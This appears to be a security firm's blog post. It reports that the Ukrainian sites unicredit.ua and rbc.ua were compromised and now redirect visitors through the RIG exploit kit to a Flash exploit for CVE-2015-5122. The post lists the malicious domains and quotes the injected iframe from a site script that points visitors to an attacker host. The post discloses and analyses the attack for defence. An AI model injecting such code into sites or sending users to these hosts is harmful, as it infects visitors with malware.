The Ukrainian website unicredit.ua is the 704th most popular website in Ukraine, according to Alexa. This exploit does not trigger every time the site is loaded, so there must be some logic that controls the schedule of when the malware redirection occurs.

unicredit2

 

Here is the full infection chain: 

 1 start   www.unicredit.ua
 2_redirector     oggy.co
 3 payload     cancel.bananacake.info/<malware>

 

The website is redirecting to a Flash exploit CVE 2015-5122 hosted at bananacake.info . It is part of the RIG exploit kit.  The JavaScript code of this kit can detect the presence of some antivirus software on the system – see the code listing below (click to enlarge).
unicredit4

In this case malvertising was not involved, instead the site itself was compromised, specifically there is an injection with
<iframe src=”http://oggy.co/wkap.php” width=”101″ height=”102″></iframe>
in 
https://www.unicredit.ua/script/cutthroughbanner.js 

We reached out to UniCredit to notify them of this attack, but have not heard back so far.

Interestingly, this is not the only attack on a prominent Ukrainian website this week. We have seen the same attack, likely by the same group – on another high profile Ukrainian news site: rbc.ua , two days ago – on Jul 13 09:31 UTC time.  

 

RBC stands for RosBusinessConsulting, which is a large media group listed on russian stock exchange as RBCM . It has more than 1500 employees and revenue of  $81 million dollars. Here is the RBC.ua infection chain: 

 1 start   www.rbc.ua
 2 payload    add.gainesville-hypnosis.com/?<malware>

 

 RIG  exploit kit was also used in RBC.ua compromise.  RIG is a popular exploit kit which has been around for about a year and sold on various “underground” forums. See the screenshot below (from http://www.malwaretech.com/, click to enlarge).
unicredit5

Cyphort Labs is monitoring this campaign and analyzing the payload executable and will share more results as soon as they become available.